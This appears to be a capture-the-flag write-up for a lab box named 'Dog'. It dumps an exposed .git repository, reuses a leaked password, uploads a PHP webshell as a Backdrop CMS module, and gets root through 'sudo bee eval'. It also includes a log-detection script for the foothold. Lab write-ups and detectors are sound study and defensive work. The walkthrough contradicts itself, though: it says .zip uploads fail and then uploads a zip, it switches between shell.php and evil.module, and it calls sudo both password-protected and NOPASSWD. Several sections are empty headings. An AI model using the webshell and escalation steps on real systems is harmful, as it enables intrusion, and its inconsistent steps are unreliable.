
dog

Linux · Easy · released 2025-03-08 · retired 2025-07-12

Summary

Dog is an Easy Linux box. An exposed .git directory leaks settings.php with DB creds (root:BackDropJ2024DS2024) and an admin user (tiffany, found in update.settings.json and not in the git author email, which is just [email protected]). Log in as tiffany and install a malicious Backdrop CMS module → webshell as www-data. The DB password is reused for johncusack’s SSH (and for sudo, which is not NOPASSWD). johncusack has sudo on /usr/local/bin/bee, and Backdrop’s CLI has an eval subcommand: sudo bee eval 'system("...");' → root.

The chain:

  1. git-dumper http://<TARGET>/.git/ → settings.php has mysql://root:[email protected]/backdrop. [email protected] is in files/config_*/active/update.settings.json (NOT in commit author email — that’s [email protected], a misdirection).
  2. Login Backdrop CMS as tiffany / BackDropJ2024DS2024 (form at /?q=user/login, form_id user_login).
  3. Manual installer at /?q=admin/installer/manual — accepts .tar/.tar.gz/.tgz/.bz2 only (NOT .zip). Upload a minimal module with shell.php alongside it. The shell lands at /modules/<modname>/shell.php and a cleanup cron removes it within ~1 min, so script the trigger to fire immediately.
  4. Same password works for johncusack SSH (jobert is the other home user but we don’t need them).
  5. sudo /usr/local/bin/bee eval 'system("...");' runs as root. Note bee requires cd /var/www/html first (or --root flag) so it can find the Backdrop install. sudo here is not NOPASSWD — pipe BackDropJ2024DS2024 via sudo -S.

Recon

22/tcp     OpenSSH
80/tcp     Apache → Backdrop CMS

.git is exposed.

Foothold — git-dumper + Backdrop module upload

git-dumper http://<TARGET>/.git/ ./dog
grep -i password dog/settings.php
# $database = 'mysql://root:[email protected]/backdrop';
git -C ./dog log --pretty=fuller | head
# author email: [email protected]

Login Backdrop admin as tiffany / BackDropJ2024DS2024.

Build minimal evil module:

evil/
  evil.info        (module metadata)
  evil.module      <?php system($_GET['c']); ?>

zip -r evil.zip evil

Functionality → Install → upload evil.zip → reach /modules/evil/evil.module?c=id → www-data.
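
How this foothold looks in Apache access logs, as an added detection example that is not part of the original write-up: it flags /.git/ paths that were actually served, POSTs to the manual installer, and direct requests for PHP or .module files under /modules/. The log lines, the finding names, the clean-URL variant of the installer path and the idea that normal Backdrop traffic goes through index.php are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed sample (Apache combined format); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Mar/2025:10:00:01 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.31"
203.0.113.7 - - [08/Mar/2025:10:00:02 +0000] "GET /.git/index HTTP/1.1" 200 3456 "-" "python-requests/2.31"
203.0.113.7 - - [08/Mar/2025:10:00:03 +0000] "GET /.git/objects/ab/cdef0123 HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.4 - - [08/Mar/2025:10:01:00 +0000] "GET /.git/HEAD HTTP/1.1" 404 196 "-" "curl/8.5"
203.0.113.7 - - [08/Mar/2025:10:05:00 +0000] "POST /?q=admin/installer/manual HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Mar/2025:10:05:20 +0000] "GET /modules/evil/shell.php?c=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
192.0.2.10 - - [08/Mar/2025:10:06:00 +0000] "GET /modules/views/views.css HTTP/1.1" 200 777 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
GIT_PATH = re.compile(r'^/\.git(/|$)')
# Manual installer, in the ?q= form used on the page or (assumed) with clean URLs.
INSTALLER = re.compile(r'(^/|[?&]q=)admin/installer/manual(\?|&|$)')
# Assumption: normal Backdrop traffic is routed through index.php, so a direct
# request for a .php or .module file under /modules/ is worth an alert.
MODULE_PHP = re.compile(r'^/modules/[^/]+/[^?]*\.(?:php|module)(\?|$)')

def detect(log_text):
    """Return {client_ip: [finding, ...]} with findings in first-seen order."""
    findings = defaultdict(list)
    def add(ip, tag):
        if tag not in findings[ip]:
            findings[ip].append(tag)
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, target, status = m.group(1), m.group(2), m.group(3), int(m.group(4))
        if GIT_PATH.match(target):
            # 2xx means repository files were served, not just probed for
            add(ip, "git-served" if 200 <= status < 300 else "git-probe")
        if method == "POST" and INSTALLER.search(target):
            add(ip, "module-upload")
        if MODULE_PHP.match(target) and 200 <= status < 300:
            add(ip, "module-php-hit")
            if "module-upload" in findings[ip]:
                add(ip, "upload-then-exec")  # same client uploaded, then executed
    return dict(findings)

if __name__ == "__main__":
    for ip, tags in detect(SAMPLE_LOG).items():
        print(ip, ", ".join(tags))
```

Any git-served finding means the web server is handing out repository files, so the credentials in settings.php should be treated as disclosed and rotated everywhere they are reused.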

User pivot — credential reuse

$ ssh johncusack@<TARGET>
Password: BackDropJ2024DS2024

Root — sudo bee eval

$ sudo -l
(root) NOPASSWD: /usr/local/bin/bee
$ cd /var/www/html
$ sudo /usr/local/bin/bee eval 'system("bash")'
# root shell

bee is Backdrop’s drush-equivalent management CLI; the eval subcommand runs PHP code after bootstrapping the CMS. With root sudo, it’s a one-liner.

Why each step worked

Counterfactuals

Source attribution

Reconstruction is grounded in:

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.
